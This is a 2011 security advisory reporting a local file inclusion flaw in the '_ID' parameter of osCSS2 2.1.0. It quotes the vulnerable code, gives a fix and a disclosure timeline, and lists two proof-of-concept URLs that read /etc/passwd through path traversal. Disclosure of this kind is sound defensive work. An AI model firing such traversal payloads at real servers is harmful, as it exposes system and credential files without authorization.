osCSS2 "_ID" parameter Local file inclusion

2011-11-11T00:00:00
ID SECURITYVULNS:DOC:27292
Type securityvulns
Reporter Securityvulns
Modified 2011-11-11T00:00:00

Description

Advisory: osCSS2 "_ID" parameter Local file inclusion Advisory ID: SSCHADV2011-034 Author: Stefan Schurtz Affected Software: Successfully tested on osCSS2 2.1.0 (latest version) Vendor URL: http://oscss.org/ Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

========================== Vulnerability Description ==========================

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability

========================== Vulnerable code ==========================

//.htaccess RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php require($page->path_gabarit());

// includes/classes/page.php public function pile_file_lang($path_file){ global $lang; if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

if(!in_array($path_file,(array)$this->PileFileLang)) include_once($path_file); }

================== PoC-Exploit ==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../.././../../etc/passwd http://<target>/catalog/content.php?_ID=../../../../../../../../../.././etc/passwd

========= Solution =========

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

==================== Disclosure Timeline ====================

08-Nov-2011 - informed vendor 08-Nov-2011 - release date of this security advisory 08-Nov-2011 - fixed by vendor

======== Credits ========

Vulnerability found and advisory written by Stefan Schurtz.

=========== References ===========

http://oscss.org/ http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html http://dev.oscss.org/task/892 http://www.rul3z.de/advisories/SSCHADV2011-034.txt